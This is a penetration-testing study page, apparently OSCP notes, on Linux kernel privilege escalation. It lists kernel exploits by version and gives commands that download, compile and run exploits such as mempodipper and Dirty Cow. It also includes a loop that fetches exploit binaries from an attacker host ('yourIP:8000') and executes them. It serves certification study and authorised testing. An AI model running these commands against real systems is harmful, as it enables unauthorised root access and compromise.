OSCP Notes
Search…
Linux exploitation

Linux Kernel exploits

xploit_installer.py

The following script runs exploit suggester and automatically downloads and executes suggested exploits:
1
wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py
Copied!

Kernelpop

Automated kernel vulnerability enumeration and exploitation
1
https://github.com/spencerdodd/kernelpop
Copied!

Linux Local Exploit

1
linux-exploit-suggester
2
unix_privesc_check
3
kernel 2.4.x / 2.6.x (sock_sendpage 1)
4
kernel 2.4 / 2.6 (sock_sendpage 2)
5
kernel < 2.6.22 (ftruncate)
6
kernel < 2.6.34 (cap_sys_admin)
7
kernel 2.6.27 < 2.6.36 (compat)
8
kernel < 2.6.36-rc1 (can bcm)
9
kernel <= 2.6.36-rc8 (rds protocol)
10
kernel < 2.6.36.2 (half nelson)
11
kernel <= 2.6.37 (full nelson)
12
kernel 2.6 (udev)
13
kernel 3.13 (sgid)
14
kernel 3.13.0 < 3.19 (overlayfs 1)
15
kernel 3.14.5 (libfutex)
16
kernel 2.6.39 <= 3.2.2 (mempodipper)
17
kernel 2.6.28 / 3.0 (alpha-omega)
18
kernel 2.6.22 < 3.9 (Dirty Cow)
19
kernel 3.7.6 (msr)
20
kernel < 3.8.9 (perf_swevent_init)
21
kernel <= 4.3.3 (overlayfs 2)
22
kernel 4.3.3 (overlayfs 3)
23
kernel 4.4.0 (af_packet)
24
kernel 4.4.x (double-fdput)
25
kernel 4.4.0-21 (netfilter)
26
kernel 4.4.1 (refcount)
Copied!

Other exploits

Exploits worth running

    Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
    1
    https://www.exploit-db.com/exploits/37292
    Copied!
    CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
1
https://www.exploit-db.com/exploits/15285/
Copied!
    Linux Kernel <= 2.6.37 'Full-Nelson.c'
1
https://www.exploit-db.com/exploits/15704/
Copied!
    CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
1
https://git.zx2c4.com/CVE-2012-0056/about/
Copied!
    Linux CVE 2012-0056
1
wget -O exploit.c <http://www.exploit-db.com/download/18411>
2
gcc -o mempodipper exploit.c
3
./mempodipper
Copied!
    CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
1
https://dirtycow.ninja/
Copied!
    Compile dirty cow:
1
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
Copied!
    Cross compiling exploits
1
gcc -m32 -o output32 hello.c #(32 bit)
2
gcc -m64 -o output hello.c # (64 bit)
Copied!
    Linux 2.6.32
1
https://www.exploit-db.com/exploits/15285/
Copied!
    Elevation in 2.6.x:
1
for a in 9352 9513 33321 15774 15150 15944 9543 33322 9545 25288 40838 40616 40611 ; do wget http://yourIP:8000/$a; chmod +x $a; ./$a; id; done
Copied!

See linux exploitation scripts

Last modified 1yr ago